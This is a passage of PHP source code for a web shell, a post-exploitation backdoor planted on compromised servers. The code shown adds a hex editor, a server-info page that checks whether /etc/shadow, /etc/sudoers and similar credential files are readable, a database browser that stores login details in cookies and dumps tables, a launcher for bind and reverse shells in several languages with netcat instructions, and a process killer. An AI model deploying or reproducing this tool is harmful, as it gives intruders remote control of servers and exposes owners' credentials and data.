  1750.             $s_fp = fopen($s_f, "r");
  1751.             if($s_fp) {
  1752.                 $s_ldump = "";
  1753.                 $s_counter = 0;
  1754.                 $s_icounter = 0;
  1755.                 while(!feof($s_fp)){
  1756.                     $s_line = fread($s_fp, 32);
  1757.                     $s_linehex = strtoupper(bin2hex($s_line));
  1758.                     $s_linex = str_split($s_linehex, 2);
  1759.                     $s_linehex = implode(" ", $s_linex);
  1760.                     $s_addr = sprintf("%08xh", $s_icounter);
  1761.  
  1762.                     $s_result .= "<tr><td class='ce w60'>".$s_addr."</td><td class='le w594'><input onselect='this.selectionEnd=this.selectionStart;' onclick=\"hu('".$s_counter."',event);\" onkeydown=\"return hf('".$s_counter."',event);\" onkeyup=\"hu('".$s_counter."',event);\" type='text' class='inputz w578' id='hex_".$s_counter."' name='hx[]' value='".$s_linehex."'  maxlength='".strlen($s_linehex)."' /></td><td class='le ls2'><pre name='hexdump' id='dump_".$s_counter."' class='mp'></pre></td></tr>";
  1763.                     $s_counter++;
  1764.                     $s_icounter+=32;
  1765.                 }
  1766.                 $s_result .= "<input type='hidden' id='counter' value='".$s_counter."' />";
  1767.                 $s_result .= "<textarea name='hxt' id='hxt' class='sembunyi'></textarea>";
  1768.                 fclose($s_fp);
  1769.             }
  1770.         }
  1771.         $s_result .= "</table></form>";
  1772.  
  1773.     } // show server information
  1774.     elseif(isset($_GP['x']) && ($_GP['x']=='info')){
  1775.         $s_result = "";
  1776.         // server misc info
  1777.         $s_result .= "<p class='notif' onclick=\"toggle('info_server')\">Server Info</p>";
  1778.         $s_result .= "<div class='info' id='info_server'><table>";
  1779.  
  1780.         if($s_win){
  1781.             foreach (range("A", "Z") as $s_letter){
  1782.                 if((@is_dir($s_letter.":\\") && @is_readable($s_letter.":\\"))){
  1783.                     $s_drive = $s_letter.":";
  1784.                     $s_result .= "<tr><td>drive ".$s_drive."</td><td>".ts(disk_free_space($s_drive))." free of ".ts(disk_total_space($s_drive))."</td></tr>";
  1785.                 }
  1786.             }
  1787.         }
  1788.         else $s_result .= "<tr><td>root partition</td><td>".ts(@disk_free_space("/"))." free of ".ts(@disk_total_space("/"))."</td></tr>";
  1789.  
  1790.         $s_result .= "<tr><td>php</td><td>".phpversion()."</td></tr>";
  1791.         $s_access = array("s_python", "s_perl", "s_ruby", "s_node", "s_nodejs", "s_gcc", "s_java", "s_javac", "s_tar", "s_wget", "s_lwpdownload", "s_lynx", "s_curl");
  1792.         foreach($s_access as $s){
  1793.             $s_t = explode("_", $s);
  1794.             if(isset($$s)) $s_result .= "<tr><td>".$s_t[1]."</td><td>".$$s."</td></tr>";
  1795.         }
  1796.  
  1797.         if(!$s_win){
  1798.             $s_interesting = array(
  1799.             "/etc/os-release", "/etc/passwd", "/etc/shadow", "/etc/group", "/etc/issue", "/etc/issue.net", "/etc/motd", "/etc/sudoers", "/etc/hosts", "/etc/aliases",
  1800.             "/proc/version", "/etc/resolv.conf", "/etc/sysctl.conf",
  1801.             "/etc/named.conf", "/etc/network/interfaces", "/etc/squid/squid.conf", "/usr/local/squid/etc/squid.conf",
  1802.             "/etc/ssh/sshd_config",
  1803.             "/etc/httpd/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", " /etc/apache2/apache2.conf", "/etc/apache2/httpd.conf", "/usr/pkg/etc/httpd/httpd.conf", "/usr/local/etc/apache22/httpd.conf", "/usr/local/etc/apache2/httpd.conf", "/var/www/conf/httpd.conf", "/etc/apache2/httpd2.conf", "/etc/httpd/httpd.conf",
  1804.             "/etc/lighttpd/lighttpd.conf", "/etc/nginx/nginx.conf",
  1805.             "/etc/fstab", "/etc/mtab", "/etc/crontab", "/etc/inittab", "/etc/modules.conf", "/etc/modules");
  1806.             foreach($s_interesting as $s_f){
  1807.                 if(@is_file($s_f) && @is_readable($s_f)) $s_result .= "<tr><td>".$s_f."</td><td><a href='".$s_self."view=".pl($s_f)."'>".$s_f." is readable</a></td></tr>";
  1808.             }
  1809.         }
  1810.         $s_result .= "</table></div>";
  1811.  
  1812.         if(!$s_win){
  1813.             // cpu info
  1814.             if($s_i_buff=trim(@fgc("/proc/cpuinfo"))){
  1815.                 $s_result .= "<p class='notif' onclick=\"toggle('info_cpu')\">CPU Info</p>";
  1816.                 $s_result .= "<div class='info' id='info_cpu'>";
  1817.                 $s_i_buffs = explode("\n\n", $s_i_buff);
  1818.                 foreach($s_i_buffs as $s_i_buffss){
  1819.                     $s_i_buffss = trim($s_i_buffss);
  1820.                     if($s_i_buffss!=""){
  1821.                         $s_i_buffsss = explode("\n", $s_i_buffss);
  1822.                         $s_result .= "<table>";
  1823.                         foreach($s_i_buffsss as $s_i){
  1824.                             $s_i = trim($s_i);
  1825.                             if($s_i!=""){
  1826.                                 $s_ii = explode(":",$s_i);
  1827.                                 if(count($s_ii)==2) $s_result .= "<tr><td>".$s_ii[0]."</td><td>".$s_ii[1]."</td></tr>";
  1828.                             }
  1829.                         }
  1830.                         $s_result .= "</table>";
  1831.                     }
  1832.                 }
  1833.                 $s_result .= "</div>";
  1834.             }
  1835.  
  1836.             // mem info
  1837.             if($s_i_buff=trim(@fgc("/proc/meminfo"))){
  1838.                 $s_result .= "<p class='notif' onclick=\"toggle('info_mem')\">Memory Info</p>";
  1839.                 $s_i_buffs = explode("\n", $s_i_buff);
  1840.                 $s_result .= "<div class='info' id='info_mem'><table>";
  1841.                 foreach($s_i_buffs as $s_i){
  1842.                     $s_i = trim($s_i);
  1843.                     if($s_i!=""){
  1844.                         $s_ii = explode(":",$s_i);
  1845.                         if(count($s_ii)==2) $s_result .= "<tr><td>".$s_ii[0]."</td><td>".$s_ii[1]."</td></tr>";
  1846.                     }
  1847.                     else $s_result .= "</table><table>";
  1848.                 }
  1849.                 $s_result .= "</table></div>";
  1850.             }
  1851.  
  1852.             // partition
  1853.             if($s_i_buff=trim(@fgc("/proc/partitions"))){
  1854.                 $s_i_buff = preg_replace("/\ +/", " ", $s_i_buff);
  1855.                 $s_result .= "<p class='notif' onclick=\"toggle('info_part')\">Partitions Info</p>";
  1856.                 $s_result .= "<div class='info' id='info_part'>";
  1857.                 $s_i_buffs = explode("\n\n", $s_i_buff);
  1858.                 $s_result .= "<table><tr>";
  1859.                 $s_i_head = explode(" ", $s_i_buffs[0]);
  1860.                 foreach($s_i_head as $s_h) $s_result .= "<th>".$s_h."</th>";
  1861.                 $s_result .= "</tr>";
  1862.                 $s_i_buffss = explode("\n", $s_i_buffs[1]);
  1863.                 foreach($s_i_buffss as $s_i_b){
  1864.                     $s_i_row = explode(" ", trim($s_i_b));
  1865.                     $s_result .= "<tr>";
  1866.                     foreach($s_i_row as $s_r) $s_result .= "<td style='text-align:center;'>".$s_r."</td>";
  1867.                     $s_result .= "</tr>";
  1868.                 }
  1869.                 $s_result .= "</table>";
  1870.                 $s_result .= "</div>";
  1871.             }
  1872.         }
  1873.         $s_phpinfo = array("PHP General" => INFO_GENERAL, "PHP Configuration" => INFO_CONFIGURATION, "PHP Modules" => INFO_MODULES, "PHP Environment" => INFO_ENVIRONMENT, "PHP Variables" => INFO_VARIABLES);
  1874.         foreach($s_phpinfo as $s_p=>$s_i){
  1875.             $s_result .= "<p class='notif' onclick=\"toggle('".$s_i."')\">".$s_p."</p>";
  1876.             ob_start();
  1877.             eval("phpinfo(".$s_i.");");
  1878.             $s_b = ob_get_contents();
  1879.             ob_end_clean();
  1880.             if(preg_match("/<body>(.*?)<\/body>/is", $s_b, $r)){
  1881.                 $s_body = str_replace(array(",", ";", "&amp;"), array(", ", "; ", "&"), $r[1]);
  1882.                 $s_result .= "<div class='info' id='".$s_i."'>".$s_body."</div>";
  1883.             }
  1884.         }
  1885.     } // working with database
  1886.     elseif(isset($_GP['x']) && ($_GP['x']=='db')){
  1887.         // sqltype : mysql, mssql, oracle, pgsql, sqlite, sqlite3, odbc, pdo
  1888.         $s_sql = array();
  1889.         $s_sql_deleted = "";
  1890.         $s_show_form = $s_show_dbs = true;
  1891.  
  1892.         if(isset($_GP['dc'])){
  1893.             $k = $_GP['dc'];
  1894.             setcookie("c[".$k."]", "" ,time() - $s_login_time);
  1895.             $s_sql_deleted = $k;
  1896.         }
  1897.  
  1898.         if(isset($_COOKIE['c']) && !isset($_GP['connect'])){
  1899.             foreach($_COOKIE['c'] as $c=>$d){
  1900.                 if($c==$s_sql_deleted) continue;
  1901.                 $s_dbcon = (function_exists("json_encode") && function_exists("json_decode"))? json_decode($d):unserialize($d);
  1902.                 foreach($s_dbcon as $k=>$v) $s_sql[$k] = $v;
  1903.                 $s_sqlport = (!empty($s_sql['port']))? ":".$s_sql['port']:"";
  1904.                 $s_result .= notif("[".$s_sql['type']."] ".$s_sql['user']."@".$s_sql['host'].$s_sqlport."
  1905.                             <span style='float:right;'><a href='".$s_self."x=db&connect=connect&sqlhost=".pl($s_sql['host'])."&sqlport=".pl($s_sql['port'])."&sqluser=".pl($s_sql['user'])."&sqlpass=".pl($s_sql['pass'])."&sqltype=".pl($s_sql['type'])."'>connect</a> | <a href='".$s_self."x=db&dc=".pl($c)."'>disconnect</a></span>");
  1906.             }
  1907.         }
  1908.         else{
  1909.             $s_sql['host'] = isset($_GP['sqlhost'])? $_GP['sqlhost'] : "";
  1910.             $s_sql['port'] = isset($_GP['sqlport'])? $_GP['sqlport'] : "";
  1911.             $s_sql['user'] = isset($_GP['sqluser'])? $_GP['sqluser'] : "";
  1912.             $s_sql['pass'] = isset($_GP['sqlpass'])? $_GP['sqlpass'] : "";
  1913.             $s_sql['type'] = isset($_GP['sqltype'])? $_GP['sqltype'] : "";
  1914.         }
  1915.  
  1916.         if(isset($_GP['connect'])){
  1917.             $s_con = sql_connect($s_sql['type'],$s_sql['host'],$s_sql['user'],$s_sql['pass']);
  1918.             $s_sqlcode = isset($_GP['sqlcode'])? $_GP['sqlcode'] : "";
  1919.  
  1920.             if($s_con!==false){
  1921.                 if(isset($_GP['sqlinit'])){
  1922.                     $s_sql_cookie = (function_exists("json_encode") && function_exists("json_decode"))? json_encode($s_sql):serialize($s_sql);
  1923.                     $s_c_num = substr(md5(time().rand(0,100)),0,3);
  1924.                     while(isset($_COOKIE['c']) && is_array($_COOKIE['c']) && array_key_exists($s_c_num, $_COOKIE['c'])){
  1925.                         $s_c_num = substr(md5(time().rand(0,100)),0,3);
  1926.                     }
  1927.                     setcookie("c[".$s_c_num."]", $s_sql_cookie ,time() + $s_login_time);
  1928.                 }
  1929.                 $s_show_form = false;
  1930.                 $s_result .= "<form action='".$s_self."' method='post'>
  1931.                     <input type='hidden' name='sqlhost' value='".hss($s_sql['host'])."' />
  1932.                     <input type='hidden' name='sqlport' value='".hss($s_sql['port'])."' />
  1933.                     <input type='hidden' name='sqluser' value='".hss($s_sql['user'])."' />
  1934.                     <input type='hidden' name='sqlpass' value='".hss($s_sql['pass'])."' />
  1935.                     <input type='hidden' name='sqltype' value='".hss($s_sql['type'])."' />
  1936.                     <input type='hidden' name='x' value='db' />
  1937.                     <input type='hidden' name='connect' value='connect' />
  1938.                     <textarea id='sqlcode' name='sqlcode' class='txtarea' style='height:150px;'>".hss($s_sqlcode)."</textarea>
  1939.                     <p><input type='submit' name='gogo' class='inputzbut' value='Go !' style='width:120px;height:30px;' />
  1940.                     &nbsp;&nbsp;Separate multiple commands with a semicolon  <span class='gaya'>[</span> ; <span class='gaya'>]</span></p>
  1941.                     </form>";
  1942.  
  1943.                 if(!empty($s_sqlcode)){
  1944.                     $s_querys = explode(";",$s_sqlcode);
  1945.                     foreach($s_querys as $s_query){
  1946.                         if(trim($s_query) != ""){
  1947.                             $s_hasil = sql_query($s_sql['type'],$s_query,$s_con);
  1948.                             if($s_hasil!=false){
  1949.                                 $s_result .= "<hr /><p style='padding:0;margin:6px 10px;font-weight:bold;'>".hss($s_query).";&nbsp;&nbsp;&nbsp;
  1950.                                 <span class='gaya'>[</span> ok <span class='gaya'>]</span></p>";
  1951.  
  1952.                                 if(!is_bool($s_hasil)){
  1953.                                     $s_result .= "<table class='explore sortable' style='width:100%;'><tr>";
  1954.                                     for($s_i = 0; $s_i<sql_num_fields($s_sql['type'],$s_hasil); $s_i++)
  1955.                                         $s_result .= "<th>".@hss(sql_field_name($s_sql['type'],$s_hasil,$s_i))."</th>";
  1956.                                     $s_result .= "</tr>";
  1957.                                     while($s_rows=sql_fetch_data($s_sql['type'],$s_hasil)){
  1958.                                         $s_result .= "<tr>";
  1959.                                         foreach($s_rows as $s_r){
  1960.                                             if(empty($s_r)) $s_r = " ";
  1961.                                             $s_result .= "<td>".@hss($s_r)."</td>";
  1962.                                         }
  1963.                                         $s_result .= "</tr>";
  1964.                                     }
  1965.                                     $s_result .= "</table>";
  1966.                                 }
  1967.                             }
  1968.                             else{
  1969.                                 $s_result .= "<p style='padding:0;margin:6px 10px;font-weight:bold;'>".hss($s_query).";&nbsp;&nbsp;&nbsp;<span class='gaya'>[</span> error <span class='gaya'>]</span></p>";
  1970.                             }
  1971.                         }
  1972.                     }
  1973.                 }
  1974.                 else{
  1975.                     if(($s_sql['type']!='pdo') && ($s_sql['type']!='odbc')){
  1976.                         if($s_sql['type']=='mysql') $s_showdb = "SHOW DATABASES";
  1977.                         elseif($s_sql['type']=='mssql') $s_showdb = "SELECT name FROM master..sysdatabases";
  1978.                         elseif($s_sql['type']=='pgsql') $s_showdb = "SELECT schema_name FROM information_schema.schemata";
  1979.                         elseif($s_sql['type']=='oracle') $s_showdb = "SELECT USERNAME FROM SYS.ALL_USERS ORDER BY USERNAME";
  1980.                         elseif($s_sql['type']=='sqlite3' || $s_sql['type']=='sqlite') $s_showdb = "SELECT \"".$s_sql['host']."\"";
  1981.                         else $s_showdb = "SHOW DATABASES";
  1982.  
  1983.                         $s_hasil = sql_query($s_sql['type'],$s_showdb,$s_con);
  1984.  
  1985.                         if($s_hasil!=false) {
  1986.                             while($s_rows_arr=sql_fetch_data($s_sql['type'],$s_hasil)){
  1987.                                 foreach($s_rows_arr as $s_rows){
  1988.                                     $s_result .= "<p class='notif' onclick=\"toggle('db_".$s_rows."')\">".$s_rows."</p>";
  1989.                                     $s_result .= "<div class='info' id='db_".$s_rows."'><table class='explore'>";
  1990.  
  1991.                                     if($s_sql['type']=='mysql') $s_showtbl = "SHOW TABLES FROM ".$s_rows;
  1992.                                     elseif($s_sql['type']=='mssql') $s_showtbl = "SELECT name FROM ".$s_rows."..sysobjects WHERE xtype = 'U'";
  1993.                                     elseif($s_sql['type']=='pgsql') $s_showtbl = "SELECT table_name FROM information_schema.tables WHERE table_schema='".$s_rows."'";
  1994.                                     elseif($s_sql['type']=='oracle') $s_showtbl = "SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE OWNER='".$s_rows."'";
  1995.                                     elseif($s_sql['type']=='sqlite3' || $s_sql['type']=='sqlite') $s_showtbl = "SELECT name FROM sqlite_master WHERE type='table'";
  1996.                                     else $s_showtbl = "";
  1997.  
  1998.                                     $s_hasil_t = sql_query($s_sql['type'],$s_showtbl,$s_con);
  1999.                                     if($s_hasil_t!=false) {
  2000.                                         while($s_tables_arr=sql_fetch_data($s_sql['type'],$s_hasil_t)){
  2001.                                             foreach($s_tables_arr as $s_tables){
  2002.                                                 if($s_sql['type']=='mysql') $s_dump_tbl = "SELECT * FROM ".$s_rows.".".$s_tables." LIMIT 0,100";
  2003.                                                 elseif($s_sql['type']=='mssql') $s_dump_tbl = "SELECT TOP 100 * FROM ".$s_rows."..".$s_tables;
  2004.                                                 elseif($s_sql['type']=='pgsql') $s_dump_tbl = "SELECT * FROM ".$s_rows.".".$s_tables." LIMIT 100 OFFSET 0";
  2005.                                                 elseif($s_sql['type']=='oracle') $s_dump_tbl = "SELECT * FROM ".$s_rows.".".$s_tables." WHERE ROWNUM BETWEEN 0 AND 100;";
  2006.                                                 elseif($s_sql['type']=='sqlite' || $s_sql['type']=='sqlite3') $s_dump_tbl = "SELECT * FROM ".$s_tables." LIMIT 0,100";
  2007.                                                 else $s_dump_tbl = "";
  2008.  
  2009.                                                 $s_dump_tbl_link = $s_self."x=db&connect=&sqlhost=".pl($s_sql['host'])."&sqlport=".pl($s_sql['port'])."&sqluser=".pl($s_sql['user'])."&sqlpass=".pl($s_sql['pass'])."&sqltype=".pl($s_sql['type'])."&sqlcode=".pl($s_dump_tbl);
  2010.  
  2011.                                                 $s_result .= "<tr><td ondblclick=\"return go('".adds($s_dump_tbl_link)."',event);\"><a href='".$s_dump_tbl_link."'>".$s_tables."</a></td></tr>";
  2012.                                             }
  2013.                                         }
  2014.                                     }
  2015.                                     $s_result .= "</table></div>";
  2016.                                 }
  2017.                             }
  2018.                         }
  2019.                     }
  2020.                 }
  2021.                 sql_close($s_sql['type'],$s_con);
  2022.             }
  2023.             else{
  2024.                 $s_result .= notif("Unable to connect to database");
  2025.                 $s_show_form = true;
  2026.             }
  2027.         }
  2028.  
  2029.         if($s_show_form){
  2030.             // sqltype : mysql, mssql, oracle, pgsql, sqlite, sqlite3, odbc, pdo
  2031.             $s_sqllist = array();
  2032.             if(function_exists("mysql_connect")) $s_sqllist["mysql"] = "Connect to MySQL <span class='desc' style='font-size:12px;'>- using class mysqli or mysql_*</span>";
  2033.             if(function_exists("mssql_connect") || function_exists("sqlsrv_connect")) $s_sqllist["mssql"] = "Connect to MsSQL <span class='desc' style='font-size:12px;'>- using sqlsrv_* or mssql_*</span>";
  2034.             if(function_exists("pg_connect")) $s_sqllist["pgsql"] = "Connect to PostgreSQL <span class='desc' style='font-size:12px;'>- using pg_*</span>";
  2035.             if(function_exists("oci_connect")) $s_sqllist["oracle"] = "Connect to oracle <span class='desc' style='font-size:12px;'>- using oci_*</span>";
  2036.             if(function_exists("sqlite_open")) $s_sqllist["sqlite"] = "Connect to SQLite <span class='desc' style='font-size:12px;'>- using sqlite_*</span>";
  2037.             if(class_exists("SQLite3")) $s_sqllist["sqlite3"] = "Connect to SQLite3 <span class='desc' style='font-size:12px;'>- using class SQLite3</span>";
  2038.             if(function_exists("odbc_connect")) $s_sqllist["odbc"] = "Connect via ODBC <span class='desc' style='font-size:12px;'>- using odbc_*</span>";
  2039.             if(class_exists("PDO")) $s_sqllist["pdo"] = "Connect via PDO <span class='desc' style='font-size:12px;'>- using class PDO</span>";
  2040.  
  2041.             foreach($s_sqllist as $s_sql['type']=>$s_sqltitle){
  2042.                 if($s_sql['type']=="odbc" || $s_sql['type']=="pdo"){
  2043.                     $s_result .= "<div class='mybox'><h2>".$s_sqltitle."</h2>
  2044.                     <form action='".$s_self."' method='post' />
  2045.                     <table class='myboxtbl'>
  2046.                     <tr><td style='width:170px;'>DSN / Connection String</td><td><input style='width:100%;' class='inputz' type='text' name='sqlhost' value='' /></td></tr>
  2047.                     <tr><td>Username</td><td><input style='width:100%;' class='inputz' type='text' name='sqluser' value='' /></td></tr>
  2048.                     <tr><td>Password</td><td><input style='width:100%;' class='inputz' type='password' name='sqlpass' value='' /></td></tr>
  2049.                     </table>
  2050.                     <input type='submit' name='connect' class='inputzbut' value='Connect !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
  2051.                     <input type='hidden' name='sqltype' value='".$s_sql['type']."' />
  2052.                     <input type='hidden' name='sqlinit' value='init' />
  2053.                     <input type='hidden' name='x' value='db' />
  2054.                     </form>
  2055.                     </div>";
  2056.                 }
  2057.                 elseif($s_sql['type']=="sqlite" || $s_sql['type']=="sqlite3"){
  2058.                     $s_result .= "<div class='mybox'><h2>".$s_sqltitle."</h2>
  2059.                     <form action='".$s_self."' method='post' />
  2060.                     <table class='myboxtbl'>
  2061.                     <tr><td style='width:170px;'>DB File</td><td><input style='width:100%;' class='inputz' type='text' name='sqlhost' value='' /></td></tr>
  2062.                     </table>
  2063.                     <input type='submit' name='connect' class='inputzbut' value='Connect !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
  2064.                     <input type='hidden' name='sqltype' value='".$s_sql['type']."' />
  2065.                     <input type='hidden' name='sqlinit' value='init' />
  2066.                     <input type='hidden' name='x' value='db' />
  2067.                     </form>
  2068.                     </div>";
  2069.                 }
  2070.                 else{
  2071.                     $s_result .= "<div class='mybox'><h2>".$s_sqltitle."</h2>
  2072.                     <form action='".$s_self."' method='post' />
  2073.                     <table class='myboxtbl'>
  2074.                     <tr><td style='width:170px;'>Host</td><td><input style='width:100%;' class='inputz' type='text' name='sqlhost' value='' /></td></tr>
  2075.                     <tr><td>Username</td><td><input style='width:100%;' class='inputz' type='text' name='sqluser' value='' /></td></tr>
  2076.                     <tr><td>Password</td><td><input style='width:100%;' class='inputz' type='password' name='sqlpass' value='' /></td></tr>
  2077.                     <tr><td>Port (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='sqlport' value='' /></td></tr>
  2078.                     </table>
  2079.                     <input type='submit' name='connect' class='inputzbut' value='Connect !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
  2080.                     <input type='hidden' name='sqltype' value='".$s_sql['type']."' />
  2081.                     <input type='hidden' name='sqlinit' value='init' />
  2082.                     <input type='hidden' name='x' value='db' />
  2083.                     </form>
  2084.                     </div>";
  2085.                 }
  2086.             }
  2087.         }
  2088.     } // bind and reverse shell
  2089.     elseif(isset($_GP['x']) && ($_GP['x']=='rs')){
  2090.         // resources $s_rs_pl $s_rs_py $s_rs_rb $s_rs_js $s_rs_c $s_rs_java $s_rs_java $s_rs_win $s_rs_php
  2091.         $s_rshost = $s_server_ip;
  2092.  
  2093.         $s_rsport = "13123"; // default port
  2094.         $s_rspesana = "Press &#39;  Go !  &#39; button and run &#39;  nc <i>server_ip</i> <i>port</i>  &#39; on your computer";
  2095.         $s_rspesanb = "Run &#39;  nc -l -v -p <i>port</i>  &#39; on your computer and press &#39;  Go !  &#39; button";
  2096.         $s_rs_err = "";
  2097.  
  2098.         $s_rsbind = $s_rsback = array();
  2099.  
  2100.         $s_rsbind["bind_php"] = "Bind Shell <span class='desc' style='font-size:12px;'>- php</span>";
  2101.         $s_rsback["back_php"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- php</span>";
  2102.  
  2103.         $s_access = array("s_python"=>"py", "s_perl"=>"pl", "s_ruby"=>"rb", "s_node"=>"js", "s_nodejs"=>"js", "s_gcc"=>"c", "s_javac"=>"java");
  2104.         foreach($s_access as $k=>$v){
  2105.             if(isset($$k)){
  2106.                 $s_t = explode("_", $k);
  2107.                 $s_rsbind["bind_".$v] = "Bind Shell <span class='desc' style='font-size:12px;'>- ".$s_t[1]."</span>";
  2108.                 $s_rsback["back_".$v] = "Reverse Shell <span class='desc' style='font-size:12px;'>- ".$s_t[1]."</span>";
  2109.             }
  2110.         }
  2111.  
  2112.         if($s_win){
  2113.             $s_rsbind["bind_win"] = "Bind Shell <span class='desc' style='font-size:12px;'>- windows executable</span>";
  2114.             $s_rsback["back_win"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- windows executable</span>";
  2115.         }
  2116.         $s_rslist = array_merge($s_rsbind,$s_rsback);
  2117.  
  2118.         if(!@is_writable($s_cwd)) $s_result .= notif("Directory ".$s_cwd." is not writable, please change to a writable one");
  2119.  
  2120.         foreach($s_rslist as $s_rstype=>$s_rstitle){
  2121.             $s_split = explode("_",$s_rstype);
  2122.             if($s_split[0]=="bind"){
  2123.                 $s_rspesan = $s_rspesana;
  2124.                 $s_rsdisabled = "disabled='disabled'";
  2125.                 $s_rstarget = $s_server_ip;
  2126.                 $s_labelip = "Server IP";
  2127.             }
  2128.             elseif($s_split[0]=="back"){
  2129.                 $s_rspesan = $s_rspesanb;
  2130.                 $s_rsdisabled = "";
  2131.                 $s_rstarget = $s_my_ip;
  2132.                 $s_labelip = "Target IP";
  2133.             }
  2134.  
  2135.             if(isset($_GP[$s_rstype])){
  2136.                 if(isset($_GP["rshost_".$s_rstype])) $s_rshost_ = $_GP["rshost_".$s_rstype];
  2137.                 if(isset($_GP["rsport_".$s_rstype])) $s_rsport_ = $_GP["rsport_".$s_rstype];
  2138.  
  2139.                 if($s_split[0]=="bind") $s_rstarget_packed = $s_rsport_;
  2140.                 elseif($s_split[0]=="back") $s_rstarget_packed = $s_rsport_." ".$s_rshost_;
  2141.  
  2142.                 if($s_split[1]=="pl") $s_rscode = $s_rs_pl;
  2143.                 elseif($s_split[1]=="py") $s_rscode = $s_rs_py;
  2144.                 elseif($s_split[1]=="rb") $s_rscode = $s_rs_rb;
  2145.                 elseif($s_split[1]=="js") $s_rscode = $s_rs_js;
  2146.                 elseif($s_split[1]=="c") $s_rscode = $s_rs_c;
  2147.                 elseif($s_split[1]=="java") $s_rscode = $s_rs_java;
  2148.                 elseif($s_split[1]=="win") $s_rscode = $s_rs_win;
  2149.                 elseif($s_split[1]=="php") $s_rscode = $s_rs_php;
  2150.  
  2151.                 $s_buff = rs($s_rstype,$s_rstarget_packed,$s_rscode);
  2152.                 if($s_buff!="") $s_rs_err = notif(hss($s_buff));
  2153.             }
  2154.             $s_result .= "<div class='mybox'><h2>".$s_rstitle."</h2>
  2155.             <form action='".$s_self."' method='post' />
  2156.             <table class='myboxtbl'>
  2157.             <tr><td style='width:100px;'>".$s_labelip."</td><td><input ".$s_rsdisabled." style='width:100%;' class='inputz' type='text' name='rshost_".$s_rstype."' value='".hss($s_rstarget)."' /></td></tr>
  2158.             <tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='rsport_".$s_rstype."' value='".hss($s_rsport)."' /></td></tr>
  2159.             </table>
  2160.             <input type='submit' name='".$s_rstype."' class='inputzbut' value='Go !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
  2161.             &nbsp;&nbsp;<span>".$s_rspesan."</span>
  2162.             <input type='hidden' name='x' value='rs' />
  2163.             </form>
  2164.             </div>";
  2165.         }
  2166.         $s_result = $s_rs_err.$s_result;
  2167.     } // task manager
  2168.     elseif(isset($_GP['x']) && ($_GP['x']=='ps')){
  2169.         $s_buff = "";
  2170.         // kill process specified by pid
  2171.         if(isset($_GP['pid'])){
  2172.             $s_p = trim($_GP['pid'],"|");
  2173.             $s_parr = explode("|", $s_p);
  2174.  
  2175.             foreach($s_parr as $s_p){
  2176.                 if(function_exists("posix_kill")) $s_buff .= (posix_kill($s_p,'9'))? notif("Process with pid ".$s_p." has been successfully killed"):notif("Unable to kill process with pid ".$s_p);
  2177.                 else{
  2178.                     if(!$s_win) $s_buff .= notif(exe("kill -9 ".$s_p));
  2179.                     else $s_buff .= notif(exe("taskkill /F /PID ".$s_p));
  2180.                 }
  2181.             }
  2182.         }
  2183.  
  2184.         if(!$s_win) $s_h = "ps aux"; // nix
  2185.         else $s_h = "tasklist /V /FO csv"; // win
  2186.         $s_wcount = 11;
  2187.         $s_wexplode = " ";
  2188.         if($s_win) $s_wexplode = "\",\"";
  2189.  
  2190.         $s_res = exe($s_h);
  2191.         if(trim($s_res)=='') $s_result = notif("Error getting process list");
  2192.         else{
  2193.             if($s_buff!="") $s_result = $s_buff;
  2194.             $s_result .= "<table class='explore sortable'>";
  2195.             if(!$s_win) $s_res = preg_replace('#\ +#',' ',$s_res);
  2196.  
  2197.             $s_psarr = explode("\n",$s_res);
  2198.             $s_fi = true;
  2199.             $s_tblcount = 0;
  2200.  
  2201.             $s_check = explode($s_wexplode,$s_psarr[0]);
  2202.             $s_wcount = count($s_check);
  2203.  
  2204.             foreach($s_psarr as $s_psa){
  2205.                 if(trim($s_psa)!=''){
  2206.                     if($s_fi){
  2207.                         $s_fi = false;
  2208.                         $s_psln = explode($s_wexplode, $s_psa, $s_wcount);
  2209.                         $s_result .= "<tr><th style='width:24px;' class='sorttable_nosort'></th><th class='sorttable_nosort'>action</th>";
  2210.                         foreach($s_psln as $s_p) $s_result .= "<th>".trim(trim(strtolower($s_p)) ,"\"")."</th>";
  2211.                         $s_result .= "</tr>";
  2212.                     }
  2213.                     else{
  2214.                         $s_psln = explode($s_wexplode, $s_psa, $s_wcount);
  2215.                         $s_result .= "<tr>";
  2216.                         $s_tblcount = 0;
  2217.                         foreach($s_psln as $s_p){
  2218.                             $s_pid = trim(trim($s_psln[1]),"\"");
  2219.                             $s_piduniq = substr(md5($s_pid),0,8);
  2220.                             if(trim($s_p)=="") $s_p = "&nbsp;";
  2221.                             if($s_tblcount == 0){
  2222.                                 $s_result .= "<td style='text-align:center;text-indent:4px;'><input id='".$s_piduniq."' name='cbox' value='".$s_pid."' type='checkbox' class='css-checkbox' onchange='hilite(this);' /><label for='".$s_piduniq."' class='css-label'></label></td><td class='ce'><a href='".$s_self."x=ps&pid=".$s_pid."'>kill</a></td><td class='ce'>".trim(trim($s_p) ,"\"")."</td>";
  2223.                                 $s_tblcount++;
  2224.                             }
  2225.                             else{
  2226.                                 $s_tblcount++;
  2227.                                 if($s_tblcount == count($s_psln)) $s_result .= "<td class='le'>".trim(trim($s_p) ,"\"")."</td>";
  2228.                                 else $s_result .= "<td class='ce'>".trim(trim($s_p) ,"\"")."</td>";
  2229.                             }
  2230.                         }
  2231.                         $s_result .= "</tr>";
  2232.                     }
  2233.                 }
  2234.             }
  2235.             $colspan = count($s_psln)+1;
  2236.             $s_result .= "<tfoot><tr class='cbox_selected'><td class='cbox_all'>
  2237.             <form action='".$s_self."' method='post'><input id='checkalll' type='checkbox' name='abox' class='css-checkbox' onclick='checkall();' /><label for='checkalll' class='css-label'></label></form>
  2238.             </td><td style='text-indent:10px;padding:2px;' colspan=".$colspan."><a href='javascript: pkill();'>kill selected <span id='total_selected'></span></a></td>
  2239.             </tr></tfoot></table>";
  2240.         }
  2241.     }
  2242.     elseif(isset($_GP['x']) && ($_GP['x']=='pass')){
  2243.         if(isset($_GP['submitnewpass'])){
  2244.             $newpass = isset($_GP['newpass'])? trim($_GP['newpass']):"";
  2245.             $newpassx = isset($_GP['newpassx'])? trim($_GP['newpassx']):"";
  2246.            
